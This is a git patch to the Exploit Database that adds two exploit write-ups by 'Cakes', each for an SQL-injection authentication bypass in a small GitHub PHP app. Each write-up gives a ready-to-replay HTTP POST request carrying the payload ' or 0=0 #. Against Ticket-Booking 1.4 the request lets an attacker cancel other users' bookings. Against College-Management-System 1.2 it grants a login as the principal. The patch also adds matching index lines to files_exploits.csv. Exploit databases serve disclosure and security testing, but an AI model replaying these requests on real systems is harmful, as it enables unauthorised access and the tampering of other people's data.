From a6db0c9d902e3540598cb22bd054b7dcd5db87b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 15 Sep 2019 05:02:26 +0000 Subject: [PATCH] DB: 2019-09-15 2 changes to exploits/shellcodes Ticket-Booking 1.4 - Authentication Bypass College-Management-System 1.2 - Authentication Bypass --- exploits/php/webapps/47387.txt | 30 ++++++++++++++++++++++++++++++ exploits/php/webapps/47388.txt | 31 +++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 63 insertions(+) create mode 100644 exploits/php/webapps/47387.txt create mode 100644 exploits/php/webapps/47388.txt diff --git a/exploits/php/webapps/47387.txt b/exploits/php/webapps/47387.txt new file mode 100644 index 000000000..2bd0448ff --- /dev/null +++ b/exploits/php/webapps/47387.txt @@ -0,0 +1,30 @@ +# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass +# Author: Cakes +# Discovery Date: 2019-09-14 +# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking +# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip +# Tested Version: 1.4 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Description: +# Easy authentication bypass vulnerability on this ticket booking application +# allowing the attacker to remove any previously booked seats + +# Simply replay the below Burp request or use Curl (remember to change the Cookie Values) + +POST /ticket/cancel.php HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/ticket/login.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 50 +Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +userid='%20or%200%3d0%20#&password=123&save=signin \ No newline at end of file diff --git a/exploits/php/webapps/47388.txt b/exploits/php/webapps/47388.txt new file mode 100644 index 000000000..384acbbcc --- /dev/null +++ b/exploits/php/webapps/47388.txt @@ -0,0 +1,31 @@ +# Exploit Title: College-Management-System 1.2 - Authentication Bypass +# Author: Cakes +# Discovery Date: 2019-09-14 +# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System +# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip +# Tested Version: 1.2 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Discription: +# Easy authentication bypass vulnerability on the application +# allowing the attacker to log in as the school principal. + +# Simply replay the below Burp request or use Curl. +# Payload: ' or 0=0 # + +POST /college/principalcheck.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/college/principalcheck.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 36 +Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +emailid='%20or%200%3d0%20#&pass=asdf \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ccf4e31f6..01789f21a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41732,3 +41732,5 @@ id,file,description,date,author,type,platform,port 47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php, 47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80 47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80 +47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php, +47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,